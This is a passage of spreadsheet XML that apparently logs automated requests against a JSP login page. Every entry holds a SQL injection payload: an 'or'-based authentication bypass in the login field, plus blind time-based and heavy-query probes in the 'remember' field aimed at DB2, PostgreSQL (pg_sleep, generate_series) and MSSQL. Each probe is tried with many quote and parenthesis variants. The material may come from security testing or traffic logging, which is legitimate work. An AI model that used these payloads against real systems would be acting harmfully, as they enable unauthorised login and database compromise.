    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and"szso"like"szso&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and(6660=6660&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and((2302=2302&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and(((4482=4482&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and('ydnl'='ydnl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and(('orya'='orya&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and((('hyxd'='hyxd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and'eiom'='eiom&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and('xiud'like'xiud&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and(('lyly'like'lyly&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and((('nlet'like'nlet&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and'vlkm'like'vlkm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and("vokg"="vokg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and(("zqso"="zqso&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and((("guyu"="guyu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and"plrn"="plrn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and("nvmq"like"nvmq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and(("swhi"like"swhi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and((("ebqj"like"ebqj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and3860=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)--and"bbhp"like"bbhp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-136&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2133)or6998=(select6998frompg_sleep(5))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7920&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5336')or6998=(select6998frompg_sleep(5))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3967&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8502'or6998=(select6998frompg_sleep(5))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1303&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1022"or6998=(select6998frompg_sleep(5))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7648&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6063)or6998=(select6998frompg_sleep(5))and(8223=8223&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-291&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7191))or6998=(select6998frompg_sleep(5))and((6410=6410&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1773&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2086)))or6998=(select6998frompg_sleep(5))and(((9902=9902&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7157&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-30or6998=(select6998frompg_sleep(5))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7100&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6924')or6998=(select6998frompg_sleep(5))and('ptlz'='ptlz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9065&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4601'))or6998=(select6998frompg_sleep(5))and(('xcnl'='xcnl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2132&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5004')))or6998=(select6998frompg_sleep(5))and((('glca'='glca&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1845&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7006'or6998=(select6998frompg_sleep(5))and'nbir'='nbir&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2607&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4838')or6998=(select6998frompg_sleep(5))and('jeii'like'jeii&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1203&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9557'))or6998=(select6998frompg_sleep(5))and(('aqwe'like'aqwe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3464&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-102')))or6998=(select6998frompg_sleep(5))and((('aoga'like'aoga&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9669&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2855'or6998=(select6998frompg_sleep(5))and'etol'like'etol&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9414&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8622")or6998=(select6998frompg_sleep(5))and("zygh"="zygh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8666&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8691"))or6998=(select6998frompg_sleep(5))and(("ujef"="ujef&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9959&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1263")))or6998=(select6998frompg_sleep(5))and((("uqsc"="uqsc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7097&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3417"or6998=(select6998frompg_sleep(5))and"onfb"="onfb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2245&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6542")or6998=(select6998frompg_sleep(5))and("jvwo"like"jvwo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3125&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5229"))or6998=(select6998frompg_sleep(5))and(("wzke"like"wzke&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2730")))or6998=(select6998frompg_sleep(5))and((("qdjy"like"qdjy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9972&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3471"or6998=(select6998frompg_sleep(5))and"jwan"like"jwan&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-928&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9703)or8303=(selectcount(*)fromgenerate_series(1,5000000))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3956&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7606')or8303=(selectcount(*)fromgenerate_series(1,5000000))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2188&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8601'or8303=(selectcount(*)fromgenerate_series(1,5000000))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-634&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2740"or8303=(selectcount(*)fromgenerate_series(1,5000000))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8813&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2193)or8303=(selectcount(*)fromgenerate_series(1,5000000))and(3638=3638&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3288&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2082))or8303=(selectcount(*)fromgenerate_series(1,5000000))and((8309=8309&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6657&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8215)))or8303=(selectcount(*)fromgenerate_series(1,5000000))and(((9194=9194&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4489&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1729or8303=(selectcount(*)fromgenerate_series(1,5000000))&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3344&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1356')or8303=(selectcount(*)fromgenerate_series(1,5000000))and('bqvt'='bqvt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3857'))or8303=(selectcount(*)fromgenerate_series(1,5000000))and(('dkxs'='dkxs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7703')))or8303=(selectcount(*)fromgenerate_series(1,5000000))and((('zybn'='zybn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9258&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7465'or8303=(selectcount(*)fromgenerate_series(1,5000000))and'xayx'='xayx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9489&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-298')or8303=(selectcount(*)fromgenerate_series(1,5000000))and('uqiu'like'uqiu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2495&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4733'))or8303=(selectcount(*)fromgenerate_series(1,5000000))and(('uylr'like'uylr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-340')))or8303=(selectcount(*)fromgenerate_series(1,5000000))and((('wyhq'like'wyhq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-459&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9806'or8303=(selectcount(*)fromgenerate_series(1,5000000))and'kevz'like'kevz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2811&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2122")or8303=(selectcount(*)fromgenerate_series(1,5000000))and("rxch"="rxch&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5115&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6675"))or8303=(selectcount(*)fromgenerate_series(1,5000000))and(("lsyq"="lsyq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3094&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-376")))or8303=(selectcount(*)fromgenerate_series(1,5000000))and((("tbob"="tbob&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6799&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1917"or8303=(selectcount(*)fromgenerate_series(1,5000000))and"thha"="thha&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4870&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7028")or8303=(selectcount(*)fromgenerate_series(1,5000000))and("qzss"like"qzss&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2137&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7396"))or8303=(selectcount(*)fromgenerate_series(1,5000000))and(("hmfo"like"hmfo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-777&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1632")))or8303=(selectcount(*)fromgenerate_series(1,5000000))and((("opze"like"opze&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5915&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5135"or8303=(selectcount(*)fromgenerate_series(1,5000000))and"vrar"like"vrar&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9037&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7924)or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2924&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4024')or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7726&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8951'or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-907&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-803"or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9480&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3911)or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(5072=5072&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1183&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7487))or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((9692=9692&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7026&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1762)))or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(((4777=4777&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9240&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6024or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1594&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2676')or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and('tqdh'='tqdh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-301&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8483'))or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and(('ynqf'='ynqf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7821&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1057')))or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and((('wcyk'='wcyk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2269&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-9139'or4499=(selectcount(*)fromsysusersassys1,sysusersassys2,sysusersassys3,sysusersassys4,sysusersassys5,sysusersassys6,sysusersassys7)and'xaro'='xaro&amp;modo=entrar</t>
  </si>
  <si>
